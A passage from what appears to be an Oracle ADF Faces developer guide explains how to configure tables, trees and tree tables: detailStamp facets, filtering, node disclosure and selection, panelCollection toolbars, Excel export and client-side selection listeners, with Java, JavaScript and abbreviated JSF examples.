  <af:inputText ...>
  <af:inputText ...>
  <af:inputText ...>
</af:iterator>
Each child is stamped as many times as necessary. Iteration starts at the index specified by the first attribute for as many indexes as specified by the rows attribute. If the rows attribute is set to 0, then the iteration continues until there are no more elements in the underlying data.
You can use the detailStamp facet in a table to include data that can be displayed or hidden. When you add a component to this facet, the table displays an additional column with a toggle icon. When the user clicks the icon, the component added to the facet is shown. When the user clicks the toggle icon again, the component is hidden. Figure 10-15 shows the additional column that is displayed when content is added to the detailStamp facet.
Note: When a table that uses the detailStamp facet is rendered in Screen Reader mode, the contents of the facet appear in a popup window. For more information about accessibility, see Chapter 22, "Developing Accessible ADF Faces Pages."
Figure 10-16 shows the same table, but with the detailStamp facet expanded for the first row.
Note: If you set the table to allow columns to freeze, the freeze will not work when you display the detailStamp facet. That is, a user cannot freeze a column while the details are being displayed.
To use the detailStamp facet, you insert a component that is bound to the data to be displayed or hidden into the facet.
To use the detailStamp facet:
In the Component Palette, drag the components you want to appear in the facet to the detailStamp facet folder.
Figure 10-17 shows the detailStamp facet folder in the Structure window.
Tip: If the facet folder does not appear in the Structure window, right-click the table and choose Facets - Table > Detail Stamp.
If the attribute to be displayed is specific to a current record, replace the JSF code (which simply binds the component to the attribute), so that it uses the table's variable to display the data for the current record.
Example 10-8 shows abbreviated code used to display the detailStamp facet shown in Figure 10-16, which shows details about the selected row.
Example 10-8 Code for detailStamp Facet
<af:table ...>
  <f:facet ...>
    <af:panelFormLayout ...>
      <af:inputText ...>
      <af:group>
        <af:inputText ...>
        <af:inputText ...>
        <af:inputText ...>
      </af:group>
    </af:panelFormLayout>
  </f:facet>
</af:table>
Note: If your application uses the Fusion technology stack, then you can drag attributes from a data control and drop them into the detailStamp facet. You don't need to modify the code.
When the user hides or shows the details of a row, the table generates a rowDisclosureEvent event. The event tells the table to toggle the details (that is, either expand or collapse). The rowDisclosureEvent event has an associated listener. You can bind the rowDisclosureListener attribute on the table to a method on a managed bean. This method will then be invoked in response to the rowDisclosureEvent event to execute any needed post-processing.
You can add a filter to a table that can be used so that the table displays only rows whose values match the filter. When enabled and set to visible, a search criteria input field displays above each searchable column. For example, the table in Figure 10-18 has been filtered to display only rows in which the Location value is 1700.
Filtered table searches are based on Query-by-Example and use the QBE text or date input field formats. The input validators are turned off to allow for entering characters for operators such as > and < to modify the search criteria.
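The operator-prefixed criteria just described can be sketched in plain Java. The QbeMatcher class below is hypothetical; it only illustrates the idea of Query-by-Example matching for a number column and is not the ADF Faces filtering implementation.

```java
// Hypothetical sketch of Query-by-Example matching for a number column:
// a leading '>' or '<' modifies the comparison; otherwise equality is used.
// Illustration only -- not the ADF Faces filter implementation.
class QbeMatcher {
    static boolean matches(String criterion, double value) {
        criterion = criterion.trim();
        if (criterion.startsWith(">")) {
            return value > Double.parseDouble(criterion.substring(1).trim());
        }
        if (criterion.startsWith("<")) {
            return value < Double.parseDouble(criterion.substring(1).trim());
        }
        // No operator prefix: treat the criterion as an equality match.
        return value == Double.parseDouble(criterion);
    }
}
```

Under this sketch, a filter value of >1500 on a Location column would match a row whose location is 1700, consistent with the filtered table described above.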
For example, you can enter >1500 as the search criteria for a number column. Wildcard characters may also be supported. Searches can be either case-sensitive or case-insensitive. If a column does not support QBE, the search criteria input field will not render for that column.
The filtering feature uses a model for filtering data into the table. The table's filterModel attribute object must be bound to an instance of the FilterableQueryDescriptor class.
Note: If your application uses the Fusion technology stack, then you can use data controls to create tables, and filtering will be created for you. For more information, see the "Creating ADF Databound Tables" chapter of the Oracle Fusion Middleware Web User Interface Developer's Guide for Oracle Application Development Framework.
In Example 10-9, the table filterVisible attribute is set to true to enable the filter input fields, and the sortProperty attribute is set on the column to identify the column in the filterModel instance. Each column element has its filterable attribute set to true.
Example 10-9 Table Component with Filtering Enabled
<af:table ...>
  <af:column ...>
    ...
  </af:column>
  <af:column ...>
    ...
  </af:column>
  <af:column ...>
    ...
  </af:column>
</af:table>
To add filtering to a table, first create a class that can provide the filtering functionality. You then bind the table to that class, and configure the table and columns to use filtering.
The table that will use filtering must either have a value for its headerText attribute, or it must contain a component in the header facet of the column that is to be filtered. This allows the filter component to be displayed. Additionally, the column must be configured to be sortable, because the filterModel class uses the sortProperty attribute.
To add filtering to a table:
Create a Java class that is a subclass of the FilterableQueryDescriptor class. For more information about this class, see the ADF Faces Javadoc.
Create a table, as described in Section 10.2, "Displaying Data in Tables."
Select the table in the Structure window and set the following attributes in the Property Inspector:
FilterVisible: Set to true to display the filter criteria input field above each searchable column.
FilterModel: Bind to an instance of the FilterableQueryDescriptor class created in Step 1.
Tip: If you want to use a component other than an inputText component for your filter (for example, an inputDate component), then instead of setting filterVisible to true, you can add the needed component to the filter facet. To do so: In the Structure window, right-click the column to be filtered and choose Insert inside af:column > JSF Core > Filter facet. From the Component Palette, drag and drop a component into the facet. Set the value of the component to the corresponding attribute within the FilterableQueryDescriptor class created in Step 1. Note that the value must take into account the variable used for the row, for example:
<af:inputDate label="Select Date" id="name" value="#{row.filterCriteria.date}"/>
In the Structure window, select a column in the table and in the Property Inspector, set the following for each column in the table:
Filterable: Set to true.
FilterFeatures: Set to caseSensitive or caseInsensitive. If not specified, the case sensitivity is determined by the model.
The ADF Faces tree component displays hierarchical data, such as organization charts or hierarchical directory structures. In data of these types, there may be a series of top-level nodes, and each element in the structure may expand to contain other elements. As an example, in an organization chart, each element, that is, each employee, in the hierarchy may have any number of child elements (direct reports). The tree component supports multiple root elements.
It displays the data in a form that represents the structure, with each element indented to the appropriate level to indicate its level in the hierarchy, and connected to its parent. Users can expand and collapse portions of the hierarchy. Figure 10-19 shows a tree used to display directories in the File Explorer application.
The ADF Faces tree component uses a model to access the data in the underlying hierarchy. The specific model class is oracle.adf.view.rich.model.TreeModel, which extends CollectionModel, described in Section 10.2, "Displaying Data in Tables." You must create your own tree model to support your tree. You may find the oracle.adf.view.rich.model.ChildPropertyTreeModel class useful when constructing a TreeModel class, as shown in Example 10-10.
Example 10-10 Constructing a TreeModel
List<TreeNode> root = new ArrayList<TreeNode>();
for (int i = 0; i < firstLevelSize; i++)
{
  List<TreeNode> level1 = new ArrayList<TreeNode>();
  for (int j = 0; j < i; j++)
  {
    List<TreeNode> level2 = new ArrayList<TreeNode>();
    for (int k = 0; k < j; k++)
    {
      TreeNode z = new TreeNode(null, _nodeVal(i, j, k));
      level2.add(z);
    }
    TreeNode c = new TreeNode(level2, _nodeVal(i, j));
    level1.add(c);
  }
  TreeNode n = new TreeNode(level1, _nodeVal(i));
  root.add(n);
}
ChildPropertyTreeModel model = new ChildPropertyTreeModel(root, "children");

private String _nodeVal(Integer... args)
{
  StringBuilder s = new StringBuilder();
  for (Integer i : args)
    s.append(i);
  return s.toString();
}
Note: If your application uses the Fusion technology stack, then you can use data controls to create trees and the model will be created for you. For more information, see the "Displaying Master-Detail Data" chapter of the Oracle Fusion Middleware Web User Interface Developer's Guide for Oracle Application Development Framework.
You can manipulate the tree similar to the way you can manipulate a table.
You can do the following: To make a node current, call the setRowIndex() method on the tree with the appropriate index into the list. Alternatively, call the setRowKey() method with the appropriate rowKey object. To access a particular node, first make that node current, and then call the getRowData() method on the tree. To access rows for expanded or collapsed nodes, call getAddedSet and getRemovedSet methods on the RowDisclosureEvent. For more information, see Section 10.5.4, "What You May Need to Know About Programmatically Expanding and Collapsing Nodes." To manipulate the node's child collection, call the enterContainer() method before calling the setRowIndex() and setRowKey() methods. Then call the exitContainer() method to return to the parent node. To point to a rowKey for a node inside the tree (at any level) use the focusRowKey attribute. The focusRowKey attribute is set when the user right-clicks on a node and selects the Show as top context menu item (or the Show as top toolbar button in the panelCollection component). When the focusRowKey attribute is set, the tree renders the node pointed to by the focusRowKey attribute as the root node in the Tree and displays a Hierarchical Selector icon next to the root node. Clicking the Hierarchical Selector icon displays a Hierarchical Selector dialog which shows the path to the focusRowKey object from the root node of the tree. How this displays depends on the components placed in the pathStamp facet. As with tables, trees use stamping to display content for the individual nodes. Trees contain a nodeStamp facet, which is a holder for the component used to display the data for each node. Each node is rendered (stamped) once, repeatedly for all nodes. As each node is stamped, the data for the current node is copied into a property that can be addressed using an EL expression. Specify the name to use for this property using the var property on the tree. 
Once the tree has completed rendering, this property is removed or reverted back to its previous value. Because of this stamping behavior, only certain types of components are supported as children inside an ADF Faces tree. All components that have no behavior are supported, as are most components that implement the ValueHolder or ActionSource interfaces.
In Example 10-11, the data for each element is referenced using the variable node, which identifies the data to be displayed in the tree. The nodeStamp facet displays the data for each element by getting further properties from the node variable:
Example 10-11 Displaying Data in a Tree
<af:tree ...>
  <f:facet ...>
    <af:outputText ...>
  </f:facet>
</af:tree>
Trees also contain a pathStamp facet. This facet determines how the content of the Hierarchical Selector dialog is rendered, just like the nodeStamp facet determines how the content of the tree is rendered. The component inside the pathStamp facet can be a combination of simple outputText, image, and outputFormatted tags and cannot be any input component (that is, any EditableValueHolder component) because no user input is allowed in the Hierarchical Selector popup. If this facet is not provided, then the Hierarchical Selector icon is not rendered.
For example, including an image and an outputText component in the pathStamp facet causes the tree to render an image and an outputText component for each node level in the Hierarchical Selector dialog. Use the same EL expression to access the value. For example, if you want to show the first name for each node in the path in an outputText component, the EL expression would be <af:outputText.
Tip: The pathStamp facet is also used to determine how default toolbar buttons provided by the panelCollection component will behave. If you want to use the buttons, add a component bound to a node value. For more information about using the panelCollection component, see Section 10.8, "Displaying Table Menus, Toolbars, and Status Bars."
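Example 10-10 above relies on a TreeNode class that the excerpt does not define. A minimal sketch of such a class might look like the following; this is a hypothetical illustration, and the real class in an application may differ, but the getChildren() accessor corresponds to the "children" property name passed to the ChildPropertyTreeModel constructor.

```java
import java.util.List;

// Hypothetical minimal node class backing Example 10-10. The "children"
// bean property (getChildren) matches the property name passed as the
// second argument to ChildPropertyTreeModel(root, "children").
class TreeNode {
    private final List<TreeNode> children; // null for a leaf node
    private final String value;            // display value for the node

    TreeNode(List<TreeNode> children, String value) {
        this.children = children;
        this.value = value;
    }

    public List<TreeNode> getChildren() { return children; }
    public String getValue() { return value; }
}
```

ChildPropertyTreeModel then discovers each node's children by reading this bean property, which is why the constructor takes the property name as a string.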
To create a tree, you add a tree component to your page and configure the display and behavior properties.
Create a Java class that extends the org.apache.myfaces.trinidad.model.TreeModel class, as shown in Example 10-10.
In the Component Palette, from the Common Components panel, drag and drop a Tree to open the Insert Tree dialog. Configure the tree as needed. Click Help or press F1 for help in using the dialog.
In the Property Inspector, expand the Data section and set the following attributes:
Value: Specify an EL expression for the object to which you want the tree to be bound. This must be an instance of org.apache.myfaces.trinidad.model.TreeModel as created in Step 1.
Var: Specify a variable name to represent each node.
VarStatus: Optionally enter a variable that can be used to determine the state of the component. During the Render Response phase, the tree iterates over the model rows and renders each node. For any given node, the varStatus attribute provides the following information:
model: A reference to the CollectionModel instance
index: The current row index
rowKey: The unique key for the current node
Expand the Appearance section and set the following attributes:
DisplayRow: Specify the node to display in the tree during the initial display. The possible values are first to display the first node, last to display the last node, and selected to display the first selected node in the tree. The default is first.
DisplayRowKey: Specify the row key to display in the tree during the initial display. This attribute should be set only programmatically. Specifying this attribute will override the displayRow attribute.
Summary: Optionally enter a summary of the data displayed by the tree.
Expand the Behavior section and set the following attributes:
InitiallyExpanded: Set to true if you want all nodes expanded when the component first renders.
EditingMode: Specify whether for any editable components used to display data in the tree, you want all the nodes to be editable (editAll), or you want the user to click a node to make it editable (clickToEdit). For more information, see Section 10.1.3, "Editing Data in Tables, Trees, and Tree Tables."
ContextMenuSelect: Determines whether or not the node is selected when you right-click to open a context menu. When set to true, the node is selected. For more information about context menus, see Chapter 13, "Using Popup Dialogs, Menus, and Windows."
RowSelection: Set a value to make the nodes selectable. Valid values are: none, single, or multiple. For information about how to then programmatically perform some action on the selected nodes, see Section 10.5.5, "What You May Need to Know About Programmatically Selecting Nodes."
FetchSize: Specify the number of rows in the data fetch block. For more information, see Section 10.1.1, "Content Delivery."
SelectionListener: Optionally enter an EL expression for a listener that handles selection events. For more information, see Section 10.5.5, "What You May Need to Know About Programmatically Selecting Nodes."
FocusListener: Optionally enter an EL expression for a listener that handles focus events.
RowDisclosureListener: Optionally enter an EL expression for a listener method that handles node disclosure events.
Expand the Advanced section and set the following attributes:
FocusRowKey: Optionally enter the node that is to be the initially focused node.
DisclosedRowKeys: Optionally enter an EL expression to a method on a backing bean that handles node disclosure. For more information, see Section 10.5.4, "What You May Need to Know About Programmatically Expanding and Collapsing Nodes."
SelectedRowKeys: Optionally enter the keys for the nodes that should be initially selected. For more information, see Section 10.5.5, "What You May Need to Know About Programmatically Selecting Nodes."
If you want your tree to size its height automatically, expand the Other section and set AutoHeightRows to the maximum number of nodes to display before a scroll bar is displayed. The default value is -1 (no automatic sizing for any number of nodes). You can set the value to 0 to have the value be the same as the fetchSize value. For more information, see Section 10.1.6, "Geometry Management and Table, Tree, and Tree Table Components."
To add components to display data in the tree, drag the desired component from the Component Palette to the nodeStamp facet. Figure 10-20 shows the nodeStamp facet for the tree used to display directories in the File Explorer application.
The component's value should be bound to the variable value set on the tree's var attribute and the attribute to be displayed. For example, the tree in the File Explorer application uses folder as the value for the var attribute, and displays the name of the directory for each node. Therefore, the value of the output component used to display the directory name is #{folder.name}.
Tip: Facets can accept only one child component. Therefore, if you want to use more than one component per node, place the components in a group component that can be the facet's direct child, as shown in Figure 10-20.
When you add a tree to a page, JDeveloper adds a nodeStamp facet to stamp out the nodes of the tree. Example 10-12 shows the abbreviated code for the tree in the File Explorer application that displays the directory structure.
Example 10-12 ADF Faces Tree Code in a JSF Page
<af:tree ...>
  <f:facet ...>
    <af:panelGroupLayout>
      <af:image ...>
      <af:outputText ...>
    </af:panelGroupLayout>
  </f:facet>
</af:tree>
The tree is displayed in a format with nodes indented to indicate their levels in the hierarchy. The user can click nodes to expand them to show children nodes. The user can click expanded nodes to collapse them. When a user clicks one of these icons, the component generates a RowDisclosureEvent event.
You can register a custom rowDisclosureListener method to handle any processing in response to the event. For more information, see Section 10.5.4, "What You May Need to Know About Programmatically Expanding and Collapsing Nodes." When a user selects or deselects a node, the tree component fires a selectionEvent event. You can register custom selectionListener instances, which can do post-processing on the tree component based on the selected nodes. For more information, see Section 10.5.5, "What You May Need to Know About Programmatically Selecting Nodes."
The RowDisclosureEvent event has two RowKeySet objects: the RemovedSet object for all the collapsed nodes and the AddedSet object for all the expanded nodes. The component expands the subtrees under all nodes in the added set and collapses the subtrees under all nodes in the removed set. Your custom rowDisclosureListener method can do post-processing on the tree component, as shown in Example 10-13.
Example 10-13 Tree Table Component with rowDisclosureListener
<af:treeTable
The backing bean method that handles row disclosure events is shown in Example 10-14. The example illustrates expansion of a tree node. For the contraction of a tree node, you would use getRemovedSet.
Example 10-14 Backing Bean Method for RowDisclosureEvent
public void handleRowDisclosure(RowDisclosureEvent rowDisclosureEvent) throws Exception {
    Object rowKey = null;
    Object rowData = null;
    RichTree tree = (RichTree) rowDisclosureEvent.getSource();
    RowKeySet rks = rowDisclosureEvent.getAddedSet();
    if (rks != null) {
        int setSize = rks.size();
        if (setSize > 1) {
            throw new Exception("Unexpected multiple row disclosure added row sets found.");
        }
        if (setSize == 0) {
            // nothing in getAddedSet indicates this is a node
            // contraction, not expansion. If interested only in handling
            // node expansion at this point, return.
            return;
        }
        rowKey = rks.iterator().next();
        tree.setRowKey(rowKey);
        rowData = tree.getRowData();
        // Do whatever is necessary for accessing tree node from
        // rowData, by casting it to an appropriate data structure,
        // for example, a Java map or Java bean, and so forth.
    }
}
Trees and tree tables use an instance of the oracle.adf.view.rich.model.RowKeySet class to keep track of which nodes are expanded. This instance is stored as the disclosedRowKeys attribute on the component. You can use this instance to control the expand or collapse state of a node in the hierarchy programmatically, as shown in Example 10-15. Any node contained by the RowKeySet instance is expanded, and all other nodes are collapsed. The addAll() method adds all elements to the set, and the removeAll() method removes all the nodes from the set.
Example 10-15 Tree Component with disclosedRowKeys Attribute
<af:tree
The backing bean method that handles the disclosed row keys is shown in Example 10-16.
Example 10-16 Backing Bean Method for Handling Row Keys
public RowKeySet getDisclosedRowKeys() {
    if (disclosedRowKeys == null) {
        // Create the PathSet that we will use to store the initial
        // expansion state for the tree
        RowKeySet treeState = new RowKeySetTreeImpl();
        // RowKeySet requires access to the TreeModel for currency.
        TreeModel model = getTreeModel();
        treeState.setCollectionModel(model);
        // Make the model point at the root node
        int oldIndex = model.getRowIndex();
        model.setRowKey(null);
        for (int i = 1; i <= 19; ++i) {
            model.setRowIndex(i);
            treeState.setContained(true);
        }
        model.setRowIndex(oldIndex);
        disclosedRowKeys = treeState;
    }
    return disclosedRowKeys;
}
The tree and tree table components allow nodes to be selected, either a single node only, or multiple nodes. If the component allows multiple selections, users can select multiple nodes using Control+click and Shift+click operations. When a user selects or deselects a node, the tree component fires a selectionEvent event.
This event has two RowKeySet objects: the RemovedSet object for all the deselected nodes and the AddedSet object for all the selected nodes. Tree and tree table components keep track of which nodes are selected using an instance of the class oracle.adf.view.rich.model.RowKeySet. This instance is stored as the selectedRowKeys attribute on the component. You can use this instance to control the selection state of a node in the hierarchy programmatically. Any node contained by the RowKeySet instance is deemed selected, and all other nodes are not selected. The addAll() method adds all nodes to the set, and the removeAll() method removes all the nodes from the set. Tree and tree table node selection works in the same way as table row selection. You can refer to sample code for table row selection in Section 10.2.8, "What You May Need to Know About Performing an Action on Selected Rows in Tables."
The ADF Faces tree table component displays hierarchical data in the form of a table. The display is more elaborate than the display of a tree component, because the tree table component can display columns of data for each tree node in the hierarchy. The component includes mechanisms for focusing on subtrees within the main tree, as well as expanding and collapsing nodes in the hierarchy. Figure 10-21 shows the tree table used in the File Explorer application. Like the tree component, the tree table can display the hierarchical relationship between the files in the collection. And like the table component, it can also display attribute values for each file. The immediate children of a tree table component must be column components, in the same way as for table components. Unlike the table, the tree table component has a nodeStamp facet which holds the column that contains the primary identifier of a node in the hierarchy. The treeTable component supports the same stamping behavior as the Tree component (for details, see Section 10.5, "Displaying Data in Trees").
For example, in the File Explorer application (as shown in Figure 10-21), the primary identifier is the file name. This column is what is contained in the nodeStamp facet. The other columns, such as Type and Size, display attribute values on the primary identifier, and these columns are the direct children of the tree table component. This tree table uses node as the value of the variable that will be used to stamp out the data for each node in the nodeStamp facet column and each component in the child columns. Example 10-17 shows abbreviated code for the tree table in the File Explorer application.
Example 10-17 Stamping Rows in a TreeTable
<af:treeTable <f:facet <af:column <af:panelGroupLayout> <af:image <af:outputText </af:panelGroupLayout> </af:column> </f:facet> <f:facet <af:panelGroupLayout> <af:image <af:outputText </af:panelGroupLayout> </f:facet> <af:column <af:outputText </af:column> <af:column <af:outputText </af:column> <af:column <af:outputText </af:column> </af:treeTable>
The tree table component supports many of the same attributes as both tables and trees. For more information about these attributes, see Section 10.2, "Displaying Data in Tables" and Section 10.5, "Displaying Data in Trees." You use the Insert Tree Table wizard to create a tree table. Once the wizard is complete, you can use the Property Inspector to configure additional attributes on the tree table.
To add a tree table to a page: In the Component Palette, from the Common Components panel, drag and drop a Tree Table onto the page to open the Insert Tree Table wizard. Configure the table by completing the wizard. If you need help, press F1 or click Help. Use the Property Inspector to configure any other attributes.
Tip: The attributes of the tree table are the same as those on the table and tree components. Refer to Section 10.2.4, "How to Display a Table on a Page," and Section 10.5.1, "How to Display Data in Trees" for help in configuring the attributes.
There may be a case where you need to pass an entire row from a collection as a value. To do this, you take the variable used in the table to represent the row (or used in the tree to represent a node) and pass it as a value to a property in the pageFlow scope. Another page can then access that value from the scope. The setPropertyListener tag allows you to do this (for more information about the setPropertyListener tag, including procedures for using it, see Section 4.7, "Passing Values Between Pages"). For example, suppose you have a master page with a single-selection table showing employees, and you want users to be able to select a row and then click a command button to navigate to a new page to edit the data for that row, as shown in Example 10-18. The EL variable name emp is used to represent one row (employee) in the table. The action attribute value of the commandButton component is a static string outcome, showEmpDetail, which allows the user to navigate to the Employee Detail page. The setPropertyListener tag takes the from value (the variable emp) and stores it with the to value.
Example 10-18 Using SetPropertyListener and PageFlowScope
<af:table <af:column <af:outputText </af:column> <af:column <af:outputText </af:column> <af:column <af:commandButton <af:setPropertyListener </af:commandButton> </af:column> </af:table>
When the user clicks the command button on an employee row, the listener executes, and the value of #{emp} is retrieved, which corresponds to the current row (employee) in the table. The retrieved row object is stored as the empDetail property of pageFlowScope with the #{pageFlowScope.empDetail} EL expression. Then the action event executes with the static outcome, and the user is navigated to a detail page. On the detail page, the outputText components get their value from pageFlowScope.empDetail objects, as shown in Example 10-19.
Example 10-19 Retrieving PageFlowScope Objects
<h:panelGrid <af:outputText <af:inputText <af:outputText <af:inputText <af:outputText <af:inputText <af:outputText <af:inputText </h:panelGrid>
You can use the panelCollection component to add menus, toolbars, and status bars to tables, trees, and tree tables. To use the panelCollection component, you add the table, tree, or tree table component as a direct child of the panelCollection component. The panelCollection component provides default menus and toolbar buttons. Figure 10-22 shows the panelCollection component with the tree table component in the File Explorer application. The toolbar contains a menu that provides actions that can be performed on the tree table (such as expanding and collapsing nodes), a button that allows users to detach the tree table, and buttons that allow users to change the rows displayed in the tree table. You can configure the toolbar to not display certain toolbar items. For example, you can turn off the buttons that allow the user to detach the tree or table. For more information about menus, toolbars, and toolbar buttons, see Chapter 14, "Using Menus, Toolbars, and Toolboxes."
Among other facets, the panelCollection component contains a menu facet to hold menu components, a toolbar facet for toolbar components, a secondaryToolbar facet for another set of toolbar components, and a statusbar facet for status items. The default top-level menu and toolbar items vary depending on the component used as the child of the panelCollection component:
Table and tree: Default top-level menu is View.
Table and tree table with selectable columns: Default top-level menu items are View and Format.
Table and tree table: Default toolbar menu is Detach.
Table and tree table with selectable columns: Default top-level toolbar items are Freeze, Detach, and Wrap.
Tree and tree table (when the pathStamp facet is used): The toolbar buttons Go Up, Go To Top, and Show as Top also appear.
Example 10-20 shows how the panelCollection component contains menus and toolbars.
Example 10-20 The panelCollection Component with Table, Menus, and Toolbars
<af:panelCollection <f:facet <af:group> <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem </af:group> </f:facet> <f:facet <af:menu <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem </af:menu> </f:facet> <f:facet <af:toolbar> <af:commandToolbarButton </af:commandToolbarButton> <af:commandToolbarButton </af:commandToolbarButton> <af:commandToolbarButton </af:commandToolbarButton> </af:toolbar> </f:facet> <f:facet </f:facet> <f:facet <af:toolbar> <af:outputText </af:toolbar> </f:facet> <af:table rowselection="multiple" columnselection="multiple" ... <af:column ... </af:column>
Tip: You can make menus detachable in the panelCollection component. For more information, see Section 14.2, "Using Menus in a Menu Bar." Consider using detached menus when you expect users to do any of the following:
Execute similar commands repeatedly on a page.
Execute similar commands on different rows of data in a large table, tree table, or tree.
View data in long and wide tables, tree tables, or trees. Users can choose which columns or branches to hide or display with a single click.
Format data in long or wide tables, tree tables, or trees.
You add a panelCollection component and then add the table, tree, or tree table inside the panelCollection component. You can then add and modify the menus and toolbars for it.
To create a panelCollection component with an aggregate display component: In the Component Palette, from the Layout panel, drag and drop a Panel Collection onto the page. Add the table, tree, or tree table as a child to that component. Alternatively, if the table, tree, or tree table already exists on the page, you can right-click the component and choose Surround With.
Then select Panel Collection to wrap the component with the panelCollection component. Optionally, customize the panelCollection toolbar by turning off specific toolbar and menu items. To do so, select the panelCollection component in the Structure window. In the Property Inspector, set the featuresOff attribute. Table 10-1 shows the valid values and the corresponding effect on the toolbar.
Add your custom menus and toolbars to the component:
Menus: Add a menu component inside the menu facet.
Toolbars: Add a toolbar component inside the toolbar or secondaryToolbar facet.
Status items: Add items inside the statusbar facet.
View menu: Add commandMenuItem components to the viewMenu facet. For multiple items, use the group component as a container for the many commandMenuItem components.
From the Component Palette, drag and drop the component into the facet. For example, drop Menu into the menu facet, then drop Menu Items into the same facet to build a menu list. For more instructions about menus and toolbars, see Chapter 14, "Using Menus, Toolbars, and Toolboxes."
You can export the data from a table, tree, or tree table, or from a table region of the DVT project Gantt chart, to a Microsoft Excel spreadsheet. To allow users to export a table, you create an action source, such as a command button or command link, and add an exportCollectionActionListener component and associate it with the data you wish to export. You can configure the table so that all the rows will be exported, or so that only the rows selected by the user will be exported.
Tip: You can also export data from a DVT pivot table. For more information, see Section 26.8, "Exporting from a Pivot Table."
For example, Figure 10-23 shows the table from the ADF Faces demo that includes a command button component that allows users to export the data to an Excel spreadsheet. When the user clicks the command button, the listener processes the exporting of all the rows to Excel.
As shown in Figure 10-23, you can also configure the exportCollectionActionListener component so that only the rows the user selects are exported.
Note: Only the following can be exported:
Value of value holder components (such as input and output components).
Value of selectItem components used in selectOneChoice and selectOneListbox components (the value of selectItem components in other selection components is not exported).
Value of the text attribute of a command component.
Depending on the browser and the configuration of the listener, the browser will either open a dialog allowing the user to open or save the spreadsheet, as shown in Figure 10-24, or the spreadsheet will be displayed in the browser. For example, if the user is viewing the page in Microsoft Internet Explorer, and no file name has been specified on the exportCollectionActionListener component, the file is displayed in the browser. In Mozilla Firefox, the dialog opens. If the user chooses to save the file, it can later be opened in Excel, as shown in Figure 10-25. If the user chooses to open the file, what happens depends on the browser. For example, if the user is viewing the page in Microsoft Internet Explorer, the spreadsheet opens in the browser window. If the user is viewing the page in Mozilla Firefox, the spreadsheet opens in Excel.
Note: You may receive a warning from Excel stating that the file is in a different format than specified by the file extension. This warning can be safely ignored.
You create a command component, such as a button, link, or menu item, and add the exportCollectionActionListener inside this component. Then you associate the data collection you want to export by setting the exportCollectionActionListener component's exportedId attribute to the ID of the collection component whose data you wish to export.
Before you begin: You should already have a table, tree, or tree table on your page.
If you do not, follow the instructions in this chapter to create a table, tree, or tree table. For example, to add a table, see Section 10.2, "Displaying Data in Tables."
Tip: If you want users to be able to select rows to export, then configure your table to allow selection. For more information, see Section 10.2.2, "Formatting Tables."
To export collection data to an external format: In the Component Palette, from the Common Components panel, drag and drop a command component, such as a button, to your page.
Tip: If you want your table, tree, or tree table to have a toolbar that will hold command components, you can wrap the collection component in a panelCollection component. This component adds toolbar functionality. For more information, see Section 10.8, "Displaying Table Menus, Toolbars, and Status Bars."
You may want to change the default label of the command component to a meaningful name such as Export to Excel. In the Component Palette, from the Operations panel, drag an Export Collection Action Listener as a child to the command component. In the Insert Export Collection Action Listener dialog, set the following:
ExportedId: Specify the ID of the table, tree, or tree table to be exported. Either enter it manually or use the dropdown menu to choose Edit. Use the Edit Property dialog to select the component.
Type: Set to excelHTML.
With the exportCollectionActionListener component still selected, in the Property Inspector, set the following:
Filename: Specify the proposed file name for the exported content. When this attribute is set, a "Save File" dialog will typically be displayed, though this is ultimately up to the browser. If the attribute is not set, the content will typically be displayed inline, in the browser, if possible.
Title: Specify the title of the exported document. Whether or not the title is displayed, and how exactly it is displayed, depends on Excel.
ExportedRows: Set to all if you want all rows to be automatically selected and exported.
Set to selected if you want only the rows the user has selected to be exported. Example 10-21 shows the code for a table and its exportCollectionActionListener component. Note that the exportedId value is set to the table id value.
Example 10-21 Using the exportCollectionActionListener to Export a Table
<af:table <af:column> . . . </af:column> </af:table> <af:commandButton <af:exportCollectionActionListener
Exported data is exported in index order, not selected key order. This means that if you allow selected rows to be exported, and the user selects rows (in this order) 8, 4, and 2, then the rows will be exported and displayed in Excel in the order 2, 4, 8.
Since there is no client-side support for EL in the rich client framework, and no support for sending entire table models to the client, client-side JavaScript cannot rely on component stamping to access a row's value. Instead of reusing the same component instance on each row, a new JavaScript component is created for each row (assuming any component needs to be created at all for any of the rows), using the fully resolved EL expressions. Therefore, to access row-specific data on the client, you need to use the stamped component itself to access the value. To do this without a client-side data model, you use a client-side selection change listener.
To access values on the client from a stamped component, you first need to make sure the component has a client representation. Then you register a selection change listener on the client and have that listener determine the selected row, find the associated stamped component for that row, use the stamped component to determine the row-specific name, and finally interact with the selected data as needed.
To access selected values from stamped components: In the Structure window for your page, select the component associated with the stamped row.
For example, in Example 10-22 the table uses an outputText component to display the stamped rows.
Example 10-22 Table Component Uses an outputText Component for Stamped Rows
<af:table <af:column <af:outputText </af:column> </af:table>
Set the following on the component: Expand the Common section of the Property Inspector and, if one is not already defined, set a unique ID for the component using the Id attribute. Expand the Advanced section and set ClientComponent to True. In the Component Palette, from the Operations panel, drag and drop a Client Listener as a child to the table. In the Insert Client Listener dialog, enter a function name in the Method field (you will implement this function in the next step), and select selection from the Type dropdown. If, for example, you entered mySelectedRow as the function, JDeveloper would enter the code shown in bold in Example 10-23.
Example 10-23 Using a clientListener to Register a Selection
<af:table <af:clientListener ... </af:table>
This code causes the mySelectedRow function to be called any time the selection changes. In your JavaScript library, implement the function entered in the last step. This function should do the following:
Figure out what row was selected. To do this, use the event object that is passed into the listener. In the case of selection events, the event object is of type AdfSelectionEvent. This type provides access to the newly selected row keys via the getAddedSet() method, which returns a POJSO (plain old JavaScript object) that contains properties for each selected row key. Once you have access to this object, you can iterate over the row keys using a "for in" loop. For example, the code in Example 10-24 extracts the first row key (which in this case, is the only row key).
Find the stamped component associated with the selected row. The client-side component API AdfUIComponent exposes a findComponent() method that takes the ID of the component to find and returns the AdfUIComponent instance.
When using stamped components, you need to find a component not just by its ID, but by the row key as well. To support this, the AdfUITable class provides an overloaded findComponent() method, which takes both an ID and a row key. In the case of selection events, the component is the source of the event, so you can get the table from the source of the event and then use the table to find the instance using the ID and row key. Example 10-25 shows this, where nameStamp is the ID of the stamped component.
Example 10-25 Finding a Stamped Component Instance Given a Selected Row
// We need the table to find our stamped component.
// Fortunately, in the case of selection events, the
// table is the event source.
var table = event.getSource();
// Use the table to find the name stamp component by id/row key:
var nameStamp = table.findComponent("nameStamp", firstRowKey);
